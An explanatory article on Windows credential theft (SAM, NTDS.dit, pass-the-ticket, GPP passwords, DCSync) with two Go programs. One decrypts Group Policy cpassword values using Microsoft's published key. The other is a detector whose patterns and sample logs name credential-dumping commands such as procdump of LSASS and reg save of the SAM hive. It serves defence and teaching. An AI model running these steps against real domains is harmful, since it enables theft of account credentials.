Theft of Credentials: How to Avoid This Attack

Our data is more exposed than ever. A cybercriminal who obtains your credentials can take over everything on your computer. Credential theft is one of the most effective attacks, and one of the most damaging, in small, medium and large networks alike. In this guide we explain how it works and what can be done to prevent it in most cases.

What is credential theft?


Credential theft is one of the staple techniques of modern intrusions. It consists of extracting the authentication credentials of one or more users: the usernames and passwords (or the hashes and tickets derived from them) that are used to log in to the victims' computers. Once the cybercriminal holds those credentials, they can access the content of the compromised computers whenever they want, and do so looking like a legitimate user.

The attacker not only gains the files and data on the victims' computers; they can also use that access to reach other systems and carry out the same or different types of attacks. Credential theft is very flexible for the cybercriminal, because a single computer may hold many usernames and passwords. Each of those credentials in turn grants access to other computers on the same network, which themselves hold further credentials that can be taken.

As you may have noticed, this attack can have serious consequences for a network. In a few minutes an entire network can be compromised, and with it all the data on every connected computer. All of this can happen simply because one person opens an apparently legitimate email that is in fact phishing.

Keep in mind that phishing may seem like a minor attack, but it is the gateway to more severe ones such as ransomware. A variant called spear phishing sends malicious emails to specific people within a network or organization. These messages can be very convincing, because the cybercriminals study their victims thoroughly beforehand.

The danger of logging in once

Corporate networks are the main victims of credential theft, largely because most of them ask the person to enter their username and password only once. The operating system then keeps those credentials (or secrets derived from them) in memory so that it can authenticate to network resources silently on the user's behalf. That single sign-on is what makes the attacker's job easy: whoever reads those secrets out of memory may already have everything needed to operate across the network.

Theft of credentials in action

The cybercriminal has a green light to carry out this type of attack once they can run code with administrator (or SYSTEM) privileges on a computer, because reading the memory of the process that holds the logged-on users' secrets requires that level of access. From there they can run instructions of their choosing, such as extracting the credentials stored in memory with tools like gsecdump, creddump and PWDumpX.

Now, where can credentials be obtained from? One of the cybercriminals' targets is Kerberos. In theory it is one of the most secure protocols, since it was designed specifically for secure authentication: it works through a ticket system that grants users and services access to resources. However, credential theft gets around that design by stealing the tickets already issued to a user and injecting them into another session, so the attacker gains access that looks entirely legitimate (a "pass-the-ticket" attack).

Another very common and well-known target is the SAM (Security Accounts Manager). It is a file that works as a database of the local accounts of a Windows computer, and it is used to authenticate those accounts whether the person logs in at the console or over the network. Authentication works by comparing the credentials entered by the person with what is stored in the SAM file.

The big problem with the SAM is that it stores password hashes, and if that "master" file can be copied (together with the SYSTEM hive, which holds the key that protects it), those hashes can be recovered and then either cracked or reused directly to log in as those users. So in a very short time the attacker holds every local account on the machine, and because the same local administrator password is often reused across hundreds or thousands of computers, those computers and their associated services are compromised as well.

Theft of credentials from a domain controller on a network

  • NTDS.dit . This is the database file in which the Active Directory service on a domain controller stores all the information about the users that belong to the domain, including the password hashes it uses to verify their username and password.
  • Group Policy Preference files . This is a feature of the Windows operating system that allows domain policies to be deployed that include credentials (for example, to set the same local administrator password on every machine), which makes administration easier. These policies are stored in a shared folder called SYSVOL , which every domain user can read. The password inside them is encrypted, but with a fixed key that Microsoft itself published, so anyone with access to SYSVOL can decrypt it.
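To show what "access and decrypt" means in practice, here is an added example (not code from the original article) that pulls every cpassword attribute out of a constructed Groups.xml and decrypts it with the AES key Microsoft documented for Group Policy Preferences. The file contents, account name and GUIDs are invented; the cpassword value is the public test vector used in the documentation of the gpp-decrypt tool.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"encoding/hex"
	"errors"
	"fmt"
	"regexp"
	"unicode/utf16"
)

// The 32-byte AES-256 key Microsoft documented for Group Policy Preference
// passwords. It is identical in every domain, which is why an "encrypted"
// cpassword offers no protection against anyone who can read SYSVOL.
const gppKeyHex = "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"

// DecryptCPassword recovers the cleartext from a cpassword attribute:
// restore the base64 padding that GPP strips, AES-256-CBC with a zero IV,
// remove the PKCS#7 padding, then decode the UTF-16LE string.
func DecryptCPassword(cpassword string) (string, error) {
	for len(cpassword)%4 != 0 {
		cpassword += "="
	}
	ct, err := base64.StdEncoding.DecodeString(cpassword)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext is not a whole number of AES blocks")
	}
	key, _ := hex.DecodeString(gppKeyHex)
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	iv := make([]byte, aes.BlockSize) // GPP uses an all-zero IV
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)

	pad := int(pt[len(pt)-1])
	if pad == 0 || pad > aes.BlockSize || pad > len(pt) ||
		!bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return "", errors.New("bad PKCS#7 padding (not a GPP cpassword?)")
	}
	pt = pt[:len(pt)-pad]
	if len(pt)%2 != 0 {
		return "", errors.New("plaintext is not UTF-16LE")
	}
	units := make([]uint16, len(pt)/2)
	for i := range units {
		units[i] = uint16(pt[2*i]) | uint16(pt[2*i+1])<<8
	}
	return string(utf16.Decode(units)), nil
}

// cpasswordRe matches the attribute as it appears in Groups.xml,
// ScheduledTasks.xml, Services.xml and the other preference files.
var cpasswordRe = regexp.MustCompile(`cpassword="([^"]*)"`)

// FindCPasswords returns every non-empty cpassword value in one preference file.
func FindCPasswords(xmlText string) []string {
	var out []string
	for _, m := range cpasswordRe.FindAllStringSubmatch(xmlText, -1) {
		if m[1] != "" {
			out = append(out, m[1])
		}
	}
	return out
}

// Constructed sample (invented account, description and GUIDs) of a Groups.xml
// as found under \\<domain>\SYSVOL\<domain>\Policies\{GUID}\Machine\Preferences\Groups\.
const sampleGroupsXML = `<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="LocalAdmin" image="2"
        changed="2014-05-13 10:22:31" uid="{B4A2E9F2-4C61-4E4B-9A2B-1F1F3D5C7A10}">
    <Properties action="U" newName="" fullName="" description="Local admin on all workstations"
        cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
        changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="LocalAdmin"/>
  </User>
</Groups>`

func main() {
	for _, cp := range FindCPasswords(sampleGroupsXML) {
		pw, err := DecryptCPassword(cp)
		if err != nil {
			fmt.Println("cannot decrypt:", err)
			continue
		}
		fmt.Printf("cpassword %s -> %q\n", cp, pw)
	}
}
```

The decryption needs nothing but the file: no domain credentials beyond the ability to read SYSVOL, which every authenticated domain user has. The practical check for defenders is therefore to search SYSVOL for any file containing `cpassword=` and remove those preferences.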

Domain controllers also replicate directory data between themselves through a dedicated replication API. Cybercriminals use a technique called DCSync , which impersonates a domain controller and asks a real one to replicate the directory. The real controller obligingly sends the password hashes of the requested accounts, with which the attacker can carry out whatever attack they have in mind. DCSync requires an account that holds directory replication rights, which is why those rights should be granted to nothing but domain controllers themselves.

How to prevent credential theft

Professionals in the sector agree that preventing such attacks entirely is practically impossible. However, one recommended action that reduces the chances of success is not to create more users with administrator privileges than necessary. In other words, only the ones that are really needed should exist, and they should not be used to log in to ordinary workstations, where their credentials would be left in memory for an attacker to take.

The widespread adoption of multi-factor authentication is also recommended. It makes it easier and more reliable to verify that the person logging in really is the user and not an attacker holding a stolen password. Bear in mind, though, that MFA protects the initial login: a hash or ticket stolen from memory after that login can still be reused, so the measures above remain necessary. Such a rollout also helps users become aware of the importance of managing credentials properly and, most importantly, of never sharing them with others.

On the other hand, Cisco Blogs recommends the following actions:

  • Monitor access to the LSASS (Local Security Authority Subsystem Service) process, which holds the logged-on users' secrets in memory, and to databases such as the SAM (Security Accounts Manager) .
  • Look at process command lines for arguments that are typical of credential-theft tools.
  • In the case of domain controllers:
    • All logs should be monitored for suspicious activity at unusual times.
    • Check for unexpected connections coming from IP addresses that are not assigned to any of the domain controllers.
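An added example, not part of the original article or of Cisco's post, that turns those recommendations into detection logic. It runs over constructed Sysmon and Security-log records (the paths, usernames, host names and process IDs are invented; the event IDs, field names and replication GUIDs are real) and flags suspicious LSASS memory reads, credential-dumping command lines, and replication requests from principals that are not domain controllers:

```go
package main

import (
	"fmt"
	"regexp"
	"strconv"
	"strings"
)

// Event is a flattened log record: the Windows/Sysmon event ID plus the
// fields the rules need. The records below are constructed for this example.
type Event struct {
	ID     int
	Fields map[string]string
}

// Alert names the rule that fired and the evidence behind it.
type Alert struct {
	Rule     string
	Evidence string
}

// Command-line fragments typical of credential-dumping tools.
var cmdIndicators = []*regexp.Regexp{
	regexp.MustCompile(`(?i)sekurlsa::|lsadump::`),                               // Mimikatz modules
	regexp.MustCompile(`(?i)procdump.*\blsass`),                                  // Sysinternals dump of LSASS
	regexp.MustCompile(`(?i)comsvcs\.dll.*MiniDump`),                             // rundll32 MiniDump of LSASS
	regexp.MustCompile(`(?i)\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)`), // SAM/SYSTEM hive export
	regexp.MustCompile(`(?i)ntdsutil.*\bntds\b.*\bifm\b`),                        // NTDS.dit copy via "ac i ntds" ifm
}

// Control-access rights a DCSync replication request shows up with in event 4662.
var replicationGUIDs = []string{
	"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", // DS-Replication-Get-Changes
	"1131f6ad-9c07-11d1-f79f-00c04fc2dcd2", // DS-Replication-Get-Changes-All
}

// Processes that legitimately open LSASS with read access.
// Assumption: this allowlist must be tuned per estate (EDR, antivirus, ...).
var lsassReaders = map[string]bool{"msmpeng.exe": true, "csrss.exe": true, "wininit.exe": true}

// Computer accounts of the real domain controllers (assumed names).
var knownDCs = map[string]bool{"dc01$": true, "dc02$": true}

const processVMRead = 0x0010 // PROCESS_VM_READ bit in Sysmon's GrantedAccess

// baseName handles Windows paths regardless of the host the analysis runs on.
func baseName(p string) string {
	if i := strings.LastIndexAny(p, `\/`); i >= 0 {
		return p[i+1:]
	}
	return p
}

// Analyze applies the three rules. Any principal other than a known DC
// that requests directory replication is treated as DCSync.
func Analyze(events []Event, dcAccounts map[string]bool) []Alert {
	var alerts []Alert
	for _, e := range events {
		f := e.Fields
		switch e.ID {
		case 10: // Sysmon ProcessAccess
			if !strings.EqualFold(baseName(f["TargetImage"]), "lsass.exe") {
				continue
			}
			access, err := strconv.ParseUint(strings.TrimPrefix(strings.ToLower(f["GrantedAccess"]), "0x"), 16, 64)
			if err != nil || access&processVMRead == 0 {
				continue
			}
			if !lsassReaders[strings.ToLower(baseName(f["SourceImage"]))] {
				alerts = append(alerts, Alert{"lsass-memory-read", f["SourceImage"] + " " + f["GrantedAccess"]})
			}
		case 1, 4688: // process creation (Sysmon / Security log)
			for _, re := range cmdIndicators {
				if re.MatchString(f["CommandLine"]) {
					alerts = append(alerts, Alert{"credential-dump-cmdline", f["CommandLine"]})
					break
				}
			}
		case 4662: // operation performed on an AD object
			props := strings.ToLower(f["Properties"])
			for _, g := range replicationGUIDs {
				if strings.Contains(props, g) && !dcAccounts[strings.ToLower(f["SubjectUserName"])] {
					alerts = append(alerts, Alert{"dcsync", f["SubjectUserName"] + " requested " + g})
					break
				}
			}
		}
	}
	return alerts
}

// Constructed sample records; field names follow Sysmon and the Security log.
var sampleEvents = []Event{
	{ID: 10, Fields: map[string]string{"SourceImage": `C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe`, "TargetImage": `C:\Windows\System32\lsass.exe`, "GrantedAccess": "0x1010"}},
	{ID: 10, Fields: map[string]string{"SourceImage": `C:\Users\bob\Downloads\procdump64.exe`, "TargetImage": `C:\Windows\System32\lsass.exe`, "GrantedAccess": "0x1FFFFF"}},
	{ID: 1, Fields: map[string]string{"CommandLine": `rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Temp\l.dmp full`}},
	{ID: 4688, Fields: map[string]string{"CommandLine": `notepad.exe C:\Users\bob\report.txt`}},
	{ID: 4688, Fields: map[string]string{"CommandLine": `reg.exe save HKLM\SAM C:\Temp\sam.hiv`}},
	{ID: 4662, Fields: map[string]string{"SubjectUserName": "DC02$", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}},
	{ID: 4662, Fields: map[string]string{"SubjectUserName": "bob", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}},
}

func main() {
	for _, a := range Analyze(sampleEvents, knownDCs) {
		fmt.Printf("[%s] %s\n", a.Rule, a.Evidence)
	}
}
```

Two design notes. Event 4662 records the requesting account but not its network address, so the "IP not assigned to a domain controller" check is expressed here on the account name; to check the address as well, correlate the 4662 with the 4624 logon of the same logon ID. The Defender process in the first record is deliberately allowlisted: without such an allowlist the LSASS rule fires constantly, which is the most common reason this detection gets switched off.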

Credential theft is, hands down, one of the most dangerous attacks. Even so, it can be prevented to a great extent starting at the most basic level: the end user. Let's take these recommendations into account and protect what matters most at all times: our data .